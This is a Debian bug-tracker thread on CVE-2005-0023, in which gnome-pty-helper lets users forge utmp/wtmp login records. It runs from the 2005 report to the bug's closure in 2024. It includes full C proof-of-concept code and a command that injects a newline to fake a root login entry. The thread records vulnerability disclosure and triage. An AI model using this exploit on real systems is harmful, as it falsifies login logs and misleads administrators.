Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
New Bug report received and forwarded. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 09:01:20 +1000
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole
gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.
Demo output, code below.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
OUTPUT:
psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2 Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2 Sep 20 08:40 (xyz)
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ? S 08:14 0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz 31444 0.0 0.0 1484 380 pts/1 S 08:21 0:00 gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1 S 08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1 R+ 08:21 0:00 ps aux
[1]+ Done gnome-pty-helper-exploit xyz
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
CODE:
/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/
#include <sys/types.h>
#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4
/* Pid of the helper SUID process */
static pid_t helper_pid;
/* The socketpair used for the protocol */
int helper_socket_protocol [2];
/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];
#include <sys/socket.h>
#include <sys/uio.h>
static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)
static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];
iov [0].iov_base = buf;
iov [0].iov_len = sizeof (buf);
msg.msg_iov = iov;
msg.msg_iovlen = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;
if (recvmsg (helper_fd, &msg, 0) <= 0)
return -1;
return *(int *) CMSG_DATA (cmptr);
}
static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}
static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;
if (helper_pid == -1)
return NULL;
if (helper_pid == 0){
if (s_pipe (helper_socket_protocol) == -1)
return NULL;
if (s_pipe (helper_socket_fdpassing) == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
return NULL;
}
helper_pid = fork ();
if (helper_pid == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
return NULL;
}
if (helper_pid == 0){
close (0);
close (1);
dup2 (helper_socket_protocol [1], 0);
dup2 (helper_socket_fdpassing [1], 1);
/* Close aliases */
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
execl ("/usr/sbin/gnome-pty-helper", "gnome-pty-helper", NULL);
exit (1);
} else {
close (helper_socket_fdpassing [1]);
close (helper_socket_protocol [1]);
/*
* Set the close-on-exec flag for the other
* descriptors, these should never propagate
* (otherwise gnome-pty-heler wont notice when
* this process is killed).
*/
fcntl (helper_socket_protocol [0], F_SETFD, FD_CLOEXEC);
fcntl (helper_socket_fdpassing [0], F_SETFD, FD_CLOEXEC);
}
}
op = GNOME_PTY_OPEN_NO_DB_UPDATE;
if (update_wutmp & ZVT_TERM_DO_UTMP_LOG){
if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
op = GNOME_PTY_OPEN_PTY_LASTLOGUWTMP;
else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
op = GNOME_PTY_OPEN_PTY_UWTMP;
else if (update_wutmp & ZVT_TERM_DO_LASTLOG)
op = GNOME_PTY_OPEN_PTY_LASTLOGUTMP;
else
op = GNOME_PTY_OPEN_PTY_UTMP;
} else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG) {
if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
op = GNOME_PTY_OPEN_PTY_LASTLOGWTMP;
else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
op = GNOME_PTY_OPEN_PTY_WTMP;
} else
if (update_wutmp & ZVT_TERM_DO_LASTLOG)
op = GNOME_PTY_OPEN_PTY_LASTLOG;
if (write (helper_socket_protocol [0], &op, sizeof (op)) < 0)
return NULL;
n = read (helper_socket_protocol [0], &result, sizeof (result));
if (n == -1 || n != sizeof (result)){
helper_pid = 0;
return NULL;
}
if (result == 0)
return NULL;
n = read (helper_socket_protocol [0], &tag, sizeof (tag));
if (n == -1 || n != sizeof (tag)){
helper_pid = 0;
return NULL;
}
*master = receive_fd (helper_socket_fdpassing [0]);
*slave = receive_fd (helper_socket_fdpassing [0]);
return tag;
}
int main (int argc, char* argv[])
{
int slave_pty, master_pty;
void* mytag;
int log = ZVT_TERM_DO_UTMP_LOG;
char buf[1000];
printf("Writing utmp (who) record for DISPLAY=%s\n", argv[1]);
setenv("DISPLAY",argv[1],1);
if ((mytag = get_ptys (&master_pty, &slave_pty, log)) == NULL)
return;
sprintf(buf,"who | grep %s",argv[1]);
printf("Running %s\n",buf);
system(buf);
printf("utmp (who) record will be cleaned up when we exit.\n");
printf("To leave it behind, kill gnome-pty-helper: kill %d\n",helper_pid);
printf("Sleeping for 5 secs...\n");
sleep (5);
}
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages libzvt2 depends on:
ii gdk-imlib1 1.9.14-16.2 imaging library for use with gtk (
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
ii libglib1.2 1.2.10-9 The GLib library of C routines
ii libgtk1.2 1.2.10-17 The GIMP Toolkit set of widgets fo
ii libx11-6 4.3.0.dfsg.1-14 X Window System protocol client li
ii xlibs 4.3.0.dfsg.1-14 X Keyboard Extension (XKB) configu
ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime
-- no debconf information
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
Why is this filed at severity: critical? What is the attack vector here
which permits root privilege escalation?
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 11:05:10 +1000
Steve,
>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical? What is the attack vector here
> which permits root privilege escalation?
I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)
(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-tty-helper.)
Cheers, Paul
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:
> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.
> > Why is this filed at severity: critical? What is the attack vector here
> > which permits root privilege escalation?
> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)
Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.
Cheers,
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 10:37:48 +0200
Hi,
On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
Thanks for your report.
Do you have a CVE ID for this security issue?
Did you check whether libvte4 is affected?
Do you have a fix?
Thanks,
--
Loïc Minier <lool@dooz.org>
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:12:45 +1000
Dear Loic,
> Do you have a CVE ID for this security issue?
No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)
> Did you check whether libvte4 is affected?
No. Do not know what libvte4 is.
> Do you have a fix?
No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 14:18:19 +0200
On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)
Then I'll see whether it deserves one, and attempt to request one.
> > Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.
libvte4 is the GNOME 2 zquivalent of libzvt2, you can grab it from:
<http://packages.debian.org/>
the source package for this library is "vte".
I'd be nice if you could check whether the gnome-pty-helper shipped in
libvte4 is affected too. Let me know if you don't have a setup
permitting the check, or if you lack the time.
Bye,
--
Loïc Minier <lool@dooz.org>
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:43:32 +1000
Dear Loic,
>> > Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too. Let me know if you don't have a setup
> permitting the check, or if you lack the time.
Looking at the source
vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c
in line 682 it grabs
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks
Use CAN-2005-0023 for this issue.
--
- mdz
Changed Bug title.
Request was from Matt Zimmerman <mdz@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Tags added: help
Request was from Thomas Bushnell BSG <tb@becket.net>
to control@bugs.debian.org.
(full text, mbox, link).
Tags added: security
Request was from Moritz Muehlenhoff <muehlenhoff@univention.de>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
(full text, mbox, link).
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(full text, mbox, link).
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org,
control@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Fri, 30 Sep 2005 13:57:58 +0200
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks
[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]
Hi,
On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
This vulnerability is identified as CAN-2005-0023. The upstream
developers of vte have been notified of the bug at:
<http://bugzilla.gnome.org/show_bug.cgi?id=317312>
Bye,
--
Loïc Minier <lool@dooz.org>
Tags added: upstream, security
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug 329156 cloned as bug 330907.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug reassigned from package `libzvt2' to `libvte4'.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>: Bug#330907; Package libvte4.
(full text, mbox, link).
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>.
(full text, mbox, link).
To: 330907@bugs.debian.org, control@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Sat, 8 Oct 2005 20:35:21 +0200
# downgrading the clone too
severity 330907 normal
thanks
On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
>
> Loïc Minier wrote:
> > Hi,
> >
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> >
> > You can record in the utmp/wtmp logs something which is wrong, for
> > example that an user is currently connected to a display while he
> > isn't. I'm not the one to argue with though.
>
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
>
> Regards,
>
> Joey
>
> --
> Everybody talks about it, but nobody does anything about it! -- Mark Twain
>
> Please always Cc to me when replying to me on the lists.
>
--
Loïc Minier <lool@dooz.org>
Severity set to `normal'.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>: Bug#330907; Package libvte4.
(full text, mbox, link).
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>.
(full text, mbox, link).
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Wed, 12 Oct 2005 12:21:18 +1000
I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.
In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that
psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$
should suitably freak them out.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded
to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore): Bug#330907; Package libvte4.
(Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore).
(Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Tue, 30 Dec 2008 18:58:50 +1100
On 12 Oct 2005 (a long time ago!) I wrote:
> I have not yet found any uses for utmp/wtmp ...
I found a (wrongful) use for it recently, /bin/login relies on ut_line
and chowns that to the user, see
http://bugs.debian.org/505271
That is "not this bug", as this allows us to fake ut_host only...
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Bug reassigned from package `libvte4' to `vte'.
Request was from Marco Rodrigues <gothicx@sapo.pt>
to control@bugs.debian.org.
(Sat, 21 Mar 2009 15:12:06 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore): Bug#330907; Package vte.
(Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Marco Rodrigues <gothicx@sapo.pt>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore).
(Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).
To: 330907@bugs.debian.org, 144904@bugs.debian.org, 276575@bugs.debian.org,
143604@bugs.debian.org, control@bugs.debian.org,
vte@packages.debian.org
Subject: Reassigning bugs from libvte4 to vte
Date: Sat, 21 Mar 2009 15:11:01 GMT
reassign 330907 vte
reassign 144904 vte
reassign 276575 vte
reassign 143604 vte
thanks
The libvte4 package has been removed from Debian. We are reassigning
its bugs to the vte package. Please have a look at them,
and close them if they don't apply to vte anymore.
Don't hesitate to reply to this mail if you have any question.
Kind regards,
--
Marco Rodrigues
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#330907; Package vte.
(Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).
Acknowledgement sent
to paul.szabo@sydney.edu.au:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).
Added tag(s) fixed-upstream.
Request was from bts-link-upstream@lists.alioth.debian.org
to control@bugs.debian.org.
(Mon, 11 May 2015 16:54:17 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#330907; Package vte.
(Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Egmont Koblinger <egmont@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).
Subject: Re: Bug#330907: gnome-pty-helper: writes arbitrary utmp records
Date: Thu, 19 Sep 2024 19:08:00 +0100
Version: 1:0.28.2-6
On Tue, 20 Sep 2005 at 09:01:20 +1000, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records
Since 2019 (before Debian 11), the vte source package in Debian no longer
installs gnome-pty-helper, so any remaining bugs in gnome-pty-helper
are no longer relevant to its security posture.
For all purposes except the GTK2-based Debian installer, vte has been
replaced by the GTK3/GTK4-based vte2.91, but that package also stopped
providing gnome-pty-helper in 2015 (version 0.42.0-1).
libzvt was also removed from Debian, back in 2008.
So there is no longer a gnome-pty-helper in any supported branch of
Debian, in any descendant of the libzvt package in which CVE-2005-0023
was originally reported, and I'm closing this bug now.
smcv
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 18 Oct 2024 07:24:33 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.